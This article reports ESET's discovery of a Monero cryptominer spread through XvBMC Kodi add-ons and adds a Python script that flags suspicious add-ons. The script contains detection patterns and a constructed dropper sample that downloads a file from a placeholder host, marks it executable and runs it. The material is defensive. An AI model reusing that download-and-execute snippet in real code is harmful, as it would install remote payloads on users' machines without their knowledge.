According to researchers at the cybersecurity company ESET, users of the open source Kodi media player have been caught up in a cryptomining campaign. The researchers trace the campaign to XvBMC, a Dutch repository of third-party Kodi add-ons that was shut down for copyright infringement. The repository had long been suspected of links to cybercrime such as malware distribution and DDoS attacks, but this is the first verified instance of malicious activity.
The cryptomining malware is written primarily in Python and, according to ESET, was likely introduced into add-ons distributed through the repository around December 2017 (Kodi itself was not modified). Further analysis showed the following:
The malware has a multi-stage architecture and employs measures to ensure that its final payload — the cryptominer — cannot be easily traced back to the malicious add-on. The cryptominer runs on Windows and Linux and mines the cryptocurrency Monero (XMR). We have not seen a version in the wild that targets Android or macOS devices.
Although the repository has been shut down, which stops new infections from that source, the shutdown does nothing for machines that are already infected: the rough estimate is that at least 5,000 machines are running the miner, and their owners are unaware of it. ESET's analysis showed that most victims are in five countries: the United States, Israel, Greece, the United Kingdom and the Netherlands. Any user who has installed Kodi add-ons from third-party repositories should therefore err on the side of caution and run a thorough malware scan. Because the miner only runs on Windows and Linux, the signs to look for are on those machines: a sustained high CPU load from an unfamiliar process, sluggish overall performance, and overheating or fans running constantly, all of which indicate that the machine is being taxed. Removing the add-on alone may not be enough, since the final-stage miner is deliberately decoupled from the add-on that installed it; the scan should cover the whole system.
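One triage check a practitioner would run after reading the above, written here as an added example (it is not ESET's or the Kodi project's code): walk the Kodi add-on directory, flag add-ons that name the XvBMC repository, and flag Python add-on code shaped like a multi-stage downloader. It assumes the default Kodi add-on locations (~/.kodi/addons on Linux, %APPDATA%\Kodi\addons on Windows), and both heuristics are mine rather than indicators from the report: the repository name appearing in an add-on's directory name, id or provider-name, and add-on code that both fetches a remote file and launches a program or exec's downloaded code. The two sample add-ons the script writes to a temporary directory are constructed for the demonstration.

```python
"""Kodi add-on triage for Linux and Windows.

Added example for this article, not code from ESET or the Kodi project.
The XvBMC name match and the download-and-execute pattern are the
author's heuristics, not indicators taken from the report; every hit is
a cue to inspect an add-on by hand, not a verdict.
"""
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Repository name from the report; matching on it is a heuristic.
SUSPECT_REPO_PATTERN = re.compile(r"xvbmc", re.IGNORECASE)

# Calls a plain video add-on rarely needs together: fetch a remote file,
# make it executable, then launch it or exec fetched code.
SUSPICIOUS_CODE_PATTERNS = {
    "remote fetch": re.compile(r"\burllib2?\.urlopen\(|\burllib\.request\.urlopen\(|\brequests\.get\("),
    "chmod": re.compile(r"\bos\.chmod\("),
    "spawn process": re.compile(r"\bsubprocess\.(Popen|call|run)\(|\bos\.(system|popen|execvp?)\("),
    "dynamic exec": re.compile(r"\bexec\(|\beval\(|\bexecfile\("),
}

def default_addon_dirs():
    """Default add-on locations on the two platforms the miner targets (assumed defaults)."""
    dirs = [Path.home() / ".kodi" / "addons"]                         # Linux
    if os.environ.get("APPDATA"):
        dirs.append(Path(os.environ["APPDATA"]) / "Kodi" / "addons")  # Windows
    return dirs

def parse_addon_xml(addon_xml):
    """Return id, provider-name and version from an addon.xml, or {} if unreadable."""
    try:
        root = ET.parse(addon_xml).getroot()
    except (ET.ParseError, OSError):
        return {}
    return {k: root.get(a, "") for k, a in
            (("id", "id"), ("provider", "provider-name"), ("version", "version"))}

def scan_addon(addon_dir):
    """Inspect one add-on directory; return its metadata and any reasons to look closer."""
    meta = parse_addon_xml(addon_dir / "addon.xml")
    reasons = []
    haystack = " ".join((addon_dir.name, meta.get("id", ""), meta.get("provider", "")))
    if SUSPECT_REPO_PATTERN.search(haystack):
        reasons.append("references XvBMC")
    hits = set()
    for py in addon_dir.rglob("*.py"):
        try:
            text = py.read_text(errors="replace")
        except OSError:
            continue
        hits.update(label for label, pat in SUSPICIOUS_CODE_PATTERNS.items() if pat.search(text))
    # Only the combination is interesting: a downloader that also runs what it fetched.
    if "remote fetch" in hits and hits & {"spawn process", "dynamic exec"}:
        reasons.append("downloads and executes: " + ", ".join(sorted(hits)))
    return {"addon": addon_dir.name, "meta": meta, "reasons": reasons}

def scan_addons_root(root):
    """Scan every add-on below a Kodi addons directory and return only the flagged ones."""
    root = Path(root)
    if not root.is_dir():
        return []
    findings = (scan_addon(d) for d in sorted(root.iterdir()) if d.is_dir())
    return [f for f in findings if f["reasons"]]

# Constructed sample add-ons so the script can be exercised offline.
BENIGN_XML = ('<addon id="plugin.video.example.benign" version="1.0.0" provider-name="Example Author">'
              '<extension point="xbmc.python.pluginsource" library="service.py"/></addon>')
BENIGN_PY = "import xbmcgui\nxbmcgui.Dialog().ok('Hello', 'constructed benign add-on')\n"
DROPPER_XML = ('<addon id="script.module.example.dropper" version="0.0.1" provider-name="XvBMC (constructed)">'
               '<extension point="xbmc.python.module" library="lib"/></addon>')
DROPPER_PY = ("import os, subprocess, urllib2\n"
              "data = urllib2.urlopen('http://example.invalid/stage2').read()\n"
              "open('/tmp/stage2', 'wb').write(data)\n"
              "os.chmod('/tmp/stage2', 0o755)\n"
              "subprocess.Popen(['/tmp/stage2'])\n")

def build_sample_addons(base):
    """Write one benign and one dropper-shaped add-on under base/addons (constructed samples)."""
    root = Path(base) / "addons"
    for name, xml, py in (("plugin.video.example.benign", BENIGN_XML, BENIGN_PY),
                          ("script.module.example.dropper", DROPPER_XML, DROPPER_PY)):
        (root / name).mkdir(parents=True)
        (root / name / "addon.xml").write_text(xml)
        (root / name / "service.py").write_text(py)
    return root

def demo():
    """Scan the constructed samples in a temporary directory and return the flagged add-ons."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_addons_root(build_sample_addons(tmp))

if __name__ == "__main__":
    for d in default_addon_dirs():
        for f in scan_addons_root(d):
            print(d, f["addon"], f["meta"].get("version"), "; ".join(f["reasons"]))
    for f in demo():
        print("sample:", f["addon"], "; ".join(f["reasons"]))
```

Run it on an affected machine and it prints one line per flagged add-on from the default directories, followed by the result for the constructed samples. A hit is a reason to inspect the add-on by hand, not a verdict: legitimate add-ons do download content, and a dropper can avoid these strings trivially. Because the final-stage miner is decoupled from the add-on that installed it, a clean add-on directory does not prove a clean machine; follow up with a full malware scan and a look at any unfamiliar process that keeps the CPU busy.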
The lesson here is that installing add-ons from unofficial third-party repositories is more or less Russian roulette for your machine: you may well escape unscathed, but the chamber may also be loaded when you pull the metaphorical trigger.